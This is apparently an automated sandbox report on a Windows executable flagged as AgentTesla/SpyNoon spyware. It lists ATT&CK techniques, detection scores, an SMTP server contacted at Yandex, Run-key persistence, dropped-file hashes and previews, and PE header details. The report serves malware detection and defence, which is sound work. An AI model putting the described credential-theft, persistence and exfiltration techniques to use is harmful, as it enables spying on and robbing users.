Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion131	Cached Domain Credentials	Security Software Discovery231	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection111	Proc Filesystem	Virtualization/Sandbox Evasion131	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
3NeufRwoxF.exe	45%	Virustotal		Browse
3NeufRwoxF.exe	51%	ReversingLabs	Win32.Trojan.AgentTesla
3NeufRwoxF.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll	43%	ReversingLabs	Win32.Trojan.SpyNoon

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.3NeufRwoxF.exe.400000.4.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.0.3NeufRwoxF.exe.400000.3.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.2.3NeufRwoxF.exe.49d0000.4.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.0.3NeufRwoxF.exe.400000.8.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.2.3NeufRwoxF.exe.400000.1.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.1.3NeufRwoxF.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.0.3NeufRwoxF.exe.400000.6.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.0.3NeufRwoxF.exe.400000.1.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.0.3NeufRwoxF.exe.400000.2.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.0.3NeufRwoxF.exe.400000.5.unpack	100%	Avira	TR/Spy.Gen8	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://subca.ocsp-certum.com0.	0%	URL Reputation	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://yandex.oc	0%	Avira URL Cloud	safe
http://crls.ya	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://MXCHOJ.com	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com01	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://yandex.ocsp-responder.com03	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
smtp.yandex.ru	77.88.21.158	true	false		high
smtp.yandex.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://subca.ocsp-certum.com0.	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://repository.certum.pl/ca.cer09	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	false		high
http://127.0.0.1:HTTP/1.1	3NeufRwoxF.exe, 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	3NeufRwoxF.exe, 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://yandex.oc	3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	3NeufRwoxF.exe	false		high
http://repository.certum.pl/ctnca.cer09	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	false		high
http://crls.ya	3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.yandex.net/certum/ycasha2.crl0-	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735652299.0000000005450000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	3NeufRwoxF.exe, 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.certum.pl/ctnca.crl0k	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	false		high
http://MXCHOJ.com	3NeufRwoxF.exe, 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com01	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://yandex.crl.certum.pl/ycasha2.crl0q	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735652299.0000000005450000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	false		high
https://api.ipify.org%GETMozilla/5.0	3NeufRwoxF.exe, 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	false	URL Reputation: safe	low
http://crl.certum.pl/ca.crl0h	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	3NeufRwoxF.exe	false		high
https://www.certum.pl/CPS0	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735652299.0000000005450000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	3NeufRwoxF.exe, 3NeufRwoxF.exe, 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734128431.0000000000859000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730336959.0000000000824000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000000.654698567.0000000000414000.00000040.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734722737.00000000038D1000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734344539.00000000023C0000.00000004.00020000.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734912309.00000000049D2000.00000040.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.certum.pl/CPS0	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	false		high
http://yandex.ocsp-responder.com03	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735652299.0000000005450000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://repository.certum.pl/ycasha2.cer0	3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735652299.0000000005450000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
77.88.21.158	smtp.yandex.ru	Russian Federation		13238	YANDEXRU	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553010
Start date:	14.01.2022
Start time:	04:15:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	3NeufRwoxF (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/5@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 55.1% (good quality ratio 50.9%) Quality average: 77.6% Quality standard deviation: 30.9%
HCA Information:	Successful, ratio: 82% Number of executed functions: 147 Number of non-executed functions: 46
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.190.160.6, 20.190.160.129, 20.190.160.75, 20.190.160.134, 20.190.160.136, 20.190.160.2, 20.190.160.67, 20.190.160.4, 23.203.70.208, 23.205.178.153 Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, www.tm.a.prd.aadg.akadns.net, arc.msn.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, authgfx.msa.akadns6.net, go.microsoft.com, store-images.s-microsoft.com, login.live.com, go.microsoft.com.edgekey.net, clientconfig.passport.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:16:14	API Interceptor	228x Sleep call for process: 3NeufRwoxF.exe modified
04:16:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run word C:\Users\user\AppData\Roaming\word\word.exe
04:16:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run word C:\Users\user\AppData\Roaming\word\word.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
77.88.21.158	O53TFikPkp.exe	Get hash	malicious	Browse
	V5Al4cc8RL.exe	Get hash	malicious	Browse
	RFQ7534567.doc	Get hash	malicious	Browse
	MT106_11-Advance.Payment.exe	Get hash	malicious	Browse
	DHL Delivery Invoice AWB 2774038374.pdf.exe	Get hash	malicious	Browse
	DHL Delivery Invoice AWB 2774038374.exe	Get hash	malicious	Browse
	Enquiries #oPU46rkEAKUhyA4.pdf.exe	Get hash	malicious	Browse
	PUCHASE INQUIRIES.exe	Get hash	malicious	Browse
	JG4wxLFjVx.exe	Get hash	malicious	Browse
	VCoycS3b62.exe	Get hash	malicious	Browse
	zVd17VxIfi.exe	Get hash	malicious	Browse
	DHL Delivery Invoice AWB 2774038374.exe	Get hash	malicious	Browse
	8456754.doc	Get hash	malicious	Browse
	RFQ56767.doc	Get hash	malicious	Browse
	fHVTaKcT0C.exe	Get hash	malicious	Browse
	Payment 20211229.exe	Get hash	malicious	Browse
	Purchase_order_scan.exe	Get hash	malicious	Browse
	pNPpAW7x5N.exe	Get hash	malicious	Browse
	PKO_TRANS_DETAILS_20211216_0809521.exe	Get hash	malicious	Browse
	C9XFduEWGz.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
smtp.yandex.ru	O53TFikPkp.exe	Get hash	malicious	Browse	77.88.21.158
	V5Al4cc8RL.exe	Get hash	malicious	Browse	77.88.21.158
	RFQ7534567.doc	Get hash	malicious	Browse	77.88.21.158
	MT106_11-Advance.Payment.exe	Get hash	malicious	Browse	77.88.21.158
	DHL Delivery Invoice AWB 2774038374.pdf.exe	Get hash	malicious	Browse	77.88.21.158
	DHL Delivery Invoice AWB 2774038374.exe	Get hash	malicious	Browse	77.88.21.158
	Enquiries #oPU46rkEAKUhyA4.pdf.exe	Get hash	malicious	Browse	77.88.21.158
	PUCHASE INQUIRIES.exe	Get hash	malicious	Browse	77.88.21.158
	64795.doc	Get hash	malicious	Browse	77.88.21.158
	JG4wxLFjVx.exe	Get hash	malicious	Browse	77.88.21.158
	VCoycS3b62.exe	Get hash	malicious	Browse	77.88.21.158
	zVd17VxIfi.exe	Get hash	malicious	Browse	77.88.21.158
	DHL Delivery Invoice AWB 2774038374.pdf.exe	Get hash	malicious	Browse	77.88.21.158
	DHL Delivery Invoice AWB 2774038374.exe	Get hash	malicious	Browse	77.88.21.158
	8456754.doc	Get hash	malicious	Browse	77.88.21.158
	PURCHASE INQUIRIES.exe	Get hash	malicious	Browse	77.88.21.158
	RFQ56767.doc	Get hash	malicious	Browse	77.88.21.158
	SO#_UPSDT_INVOICE.exe	Get hash	malicious	Browse	77.88.21.158
	fHVTaKcT0C.exe	Get hash	malicious	Browse	77.88.21.158
	PRODUCTS INQUIRIES.exe	Get hash	malicious	Browse	77.88.21.158

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
YANDEXRU	O53TFikPkp.exe	Get hash	malicious	Browse	77.88.21.158
	1Nb1LqIIq2	Get hash	malicious	Browse	95.108.137.46
	V5Al4cc8RL.exe	Get hash	malicious	Browse	77.88.21.158
	RFQ7534567.doc	Get hash	malicious	Browse	77.88.21.158
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	77.88.21.37
	Halkbank_Ekstre_20210825_073604_628391.exe	Get hash	malicious	Browse	77.88.21.37
	MT106_11-Advance.Payment.exe	Get hash	malicious	Browse	77.88.21.158
	DHL Delivery Invoice AWB 2774038374.pdf.exe	Get hash	malicious	Browse	77.88.21.158
	DHL Delivery Invoice AWB 2774038374.exe	Get hash	malicious	Browse	77.88.21.158
	4nmeEJrZJ9.exe	Get hash	malicious	Browse	5.255.255.5
	Enquiries #oPU46rkEAKUhyA4.pdf.exe	Get hash	malicious	Browse	77.88.21.158
	PUCHASE INQUIRIES.exe	Get hash	malicious	Browse	77.88.21.158
	default.html	Get hash	malicious	Browse	77.88.21.119
	JG4wxLFjVx.exe	Get hash	malicious	Browse	77.88.21.158
	VCoycS3b62.exe	Get hash	malicious	Browse	77.88.21.158
	zVd17VxIfi.exe	Get hash	malicious	Browse	77.88.21.158
	DHL Delivery Invoice AWB 2774038374.exe	Get hash	malicious	Browse	77.88.21.158
	8456754.doc	Get hash	malicious	Browse	77.88.21.158
	DmpOiwahZV.exe	Get hash	malicious	Browse	77.88.55.50
	ZU9VbjUL19	Get hash	malicious	Browse	95.108.149.12

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\3NeufRwoxF.exe.log Download File
Process:	C:\Users\user\Desktop\3NeufRwoxF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1035
Entropy (8bit):	5.26629226223271
Encrypted:	false
SSDEEP:	24:MLF20NaL329hJ5g522rWz2pmyE49EY829XBp26K95rKoO2+g2+:MwLLG9h3go2rG2Iyb9P9XBY6ox+g2+
MD5:	B1B758A3B5F51F96241EF50244ADD244
SHA1:	FA513B977BF2DF5B6F279046B2D7B4BA024D3B68
SHA-256:	BAAFDBA30F16DFCDBC5601E4166BD5E1D3A1EAA08E9E68E44A96B00206222481
SHA-512:	A683EEEF8F41FE80EC1EFD262CE023951B262ADD965F7A0610D6A92B6C1B561D3F6ECBF165122DB06DD085D5FC19956C047C18D7CA012E549D7DE48BB0E0C718
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\6e9bdd78f7a8bb20d228fefdaa957d00\CustomMarshalers.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\4de99804c29261edb63c93616550f034\System.Management.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\de460308a9099237864d2ec2328fc958\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d

C:\Users\user\AppData\Local\Temp\kusazc8wp39 Download File
Process:	C:\Users\user\Desktop\3NeufRwoxF.exe
File Type:	data
Category:	dropped
Size (bytes):	292351
Entropy (8bit):	7.963680613819231
Encrypted:	false
SSDEEP:	6144:5J7j/PKBR0SZfeudE96KIb/78b99INzXBtVpffaPS6GXBapeYv3kXteyg:DP+HZW196KIzjNzXBLpXRFAAYvIFg
MD5:	B5CCA07383DB50DF2C8791E4D49D0388
SHA1:	A0C0F92616231ECC57C819E52F672CF31360A7D8
SHA-256:	52C89193D7D69F546AC45181644669C0FBB7F71BC892361043E7D197007A3332
SHA-512:	19B0A0CC4C4066B543F574B22A1B5078F0691B77C32F9395AC11D42720A9A2BB05B119F6983280567E234AF15F5E6A3C6C57FC4EEEA0B7AE9EFF730310C5259B
Malicious:	false
Reputation:	low
Preview:	.\|m...Y.u.....#I.g.T2~J.-n0....?..c..;.....oR....O.\|D.U5.......o..Zu...Z........^z.s{...9(...+H.....:skY..c./.Q)..S...3K..'\.....6..Aw...Oy..D...C..4.........,G.H[...... .......l..L....X...(.\|u..\......."...[,..\|...m...n....2Y..pE......G.+...k....Y..i....#cT&sT2~J.-n0..L.(.c..;......oR.^..OQ\|D.l5..5...r...{...~......j5.....@...o$.2..>.z..'s.77J..H.~H......K..)K..Zr..vT.....+.e..#J.f..C.1....!...i).$P..K&..o!...^/<.....=,I.]..gT:v..........t..A.'....,........H.........#...G.+.....1L1.Y.6...a,.#..g.T%~J.-n0....?..c..;;.N..ooR!u..O.\|D..5............e~..G...z.i...;DQ...5.2`...$E..&'s'77J.9H^.H.v.*.-..mK..([.U.t.a...+....2.f..Cm1...}...i).........v.k../<.....=,I....dT:v......j...t..A.'.............H.........#...G.+...k....Y.....aN.#..g.T2~J.-n0....?..c..;.....oR....O.\|D.U5..5.........e~.......5.....WQ...$.2.....&'s'77J.9H..H.....3K..)K..Zr.U.t.a...+....2.f..C.1....!...i).$P..K&.{..k.^/<.....=,I.]..gT:v......j...t..A.'...........

C:\Users\user\AppData\Local\Temp\nsvCA56.tmp Download File
Process:	C:\Users\user\Desktop\3NeufRwoxF.exe
File Type:	data
Category:	dropped
Size (bytes):	329718
Entropy (8bit):	7.759225914420623
Encrypted:	false
SSDEEP:	6144:W0J7j/PKBR0SZfeudE96KIb/78b99INzXBtVpffaPS6GXBapeYv3kXteyDX:ZP+HZW196KIzjNzXBLpXRFAAYvIFD
MD5:	450A7BE54EEBE6430CCF5B72345E6BF8
SHA1:	E671D233C186B44CC64C9FBAF6A3A6846CF7A5D9
SHA-256:	6326557B1B47C65C963867B910E628D4DF7685307BAA31A106EF6180D817174D
SHA-512:	2234CB5484ED783FD5955BAA6811345EB9A8C4A976B80697487A277F3D2002F39DC3C92A399807E8537F97E1CD7EC593E6845E4E02D82052B4FC95BA3837B958
Malicious:	false
Reputation:	low
Preview:	wk......,...................s....R.......j......_k..........................................................................................................................................................................................................................................J...................j...............................................................................................................................~.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll Download File
Process:	C:\Users\user\Desktop\3NeufRwoxF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.76274363382061
Encrypted:	false
SSDEEP:	24:e31GSNND0teIASdax/++mMTJK4f9Y/2rY/noNXs+f3SlLRQ0K7ABPnRuV4MPgicT:Cn4I90IKyzJFbfGFN1RuqSm
MD5:	E7CB1AB1779B1AACEDD03A0E490E0318
SHA1:	9085E849395D59F1EFA1038484A0D99355CFEF51
SHA-256:	0668DF84EEDD97C9003610F70F2C9BE76605C40A6452B6B8A739C1BC102330EF
SHA-512:	2B482173601C59EB691D230934CACA8C716E07FA18BC8EA388CC8A3B98004C5A5EFADED903E5F3817D9084319ABCBCADF51C698E2D5C254BE0A034044F4FFB85
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z-...C]..C]..C]Z.M]..C].}B\..C]..B]..C].nG\..C].nC\..C].n.]..C].nA\..C]Rich..C]........................PE..L......a...........!......................... ...............................P............@.......................... ..L.... .......0.......................@..<.................................................... ...............................text.../........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@.reloc..<....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wuatpe Download File
Process:	C:\Users\user\Desktop\3NeufRwoxF.exe
File Type:	data
Category:	dropped
Size (bytes):	5232
Entropy (8bit):	6.1063109867064895
Encrypted:	false
SSDEEP:	96:2wMTU6r2dfPoqv106Yo2QdQ0xsCqtAE3Lm7eW03d3AKfxWTaAIHq:XMTTr2dIqv106hv0tAYmqA4xWhIHq
MD5:	29323A6559E425DA23E2AEA82AB47558
SHA1:	C8A00930296EE9259ED13A8AE96DC019C402891E
SHA-256:	0295E73A190C03EF64A394D02E8DB03ADACD8D6EBA54131975204CDEAF88D59E
SHA-512:	B127F9D563830CD0F11AABC1E20CB906EE9AC16B83BE276162FF1C9F2A002169051630D65ABC06B8750F763A63AF1840C7DDBF30A72967FB2F5E2671FC04E534
Malicious:	false
Reputation:	low
Preview:	........{.H...{...W..WKE(W..WKE {....E.`...{....uT.uX.E. .....E..$.uT.uX.E. ....E....uT.uX.E. .....E....uT.uX.E. .....E...{mX.nBr..s...ET..E(...EX{ .+..E .}..E .}....+.rX....E .......E.....{..r+ ....{.\..3...u...u...u.A..u.A..u(..u ...lX.@.T.@..h{..u..u.A..E.W..E.... .....<\.[...{.\=....E.....%..T......W..WKE..E...CETkh.E....}X.L....<...E..E...H.}....E....%..T..N... p... v....L....'. .... ........=.. .... ..........{.`W..WKE .E.X....E..E.{m..lN.E.....E.H.E..E.@.E... L.....l>.E..r..s...<=..=$.E .r...!..<=..=$r.r..s...<......'. ..... .....E..W.E ..u. .....E.{m..l.{......E......E..%.......{.HW..WKE .E.`....E..E.{m..lN.E.....E.H.E..E.@.E... ......W\|.....E..r..s...<=..=..ET.r...!..<=..=..EX.r...!.<=..=..EL+.r..s...<U..U..E .r...!..<=..=.r.r..s...<...N... ..... .....E.{mP.l..E .}P...O.uP.uL.uX.uT.u. /....E.{m..l.{......E......E..%..L....{.d.E.X....E..E.{m..lN.E.....E.H.E..E.@.E... r.....l>.E..r..s...<=..= .ET.r...!..<=..= r.r..s...<....=.. _.... \....E..V.u

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.937250521287509
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3NeufRwoxF.exe
File size:	271670
MD5:	891fafcb65f039cefac6701bfb8a9253
SHA1:	e9ca83ec5e9a9264d251a3379d65dd9dfe92a16a
SHA256:	3c6d3aa382ddba97862136aa06c449150810696ef7cb05e7ec0f4ed6895683c4
SHA512:	5e7ca6e15580aac04bfcafad2ab3bd681b4fd8808775b4353d543d666231bd85827ea6285eda0046eb661cf5d0609c25c6c247440eef2d26a4952851e16d1a11
SSDEEP:	6144:owLFeIPg68CqO4M+7UwS7nC3/WfB5cUnJ3nkr9/:f5Pg69znM3SjcUJ3nkrR
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x403225
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409128h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
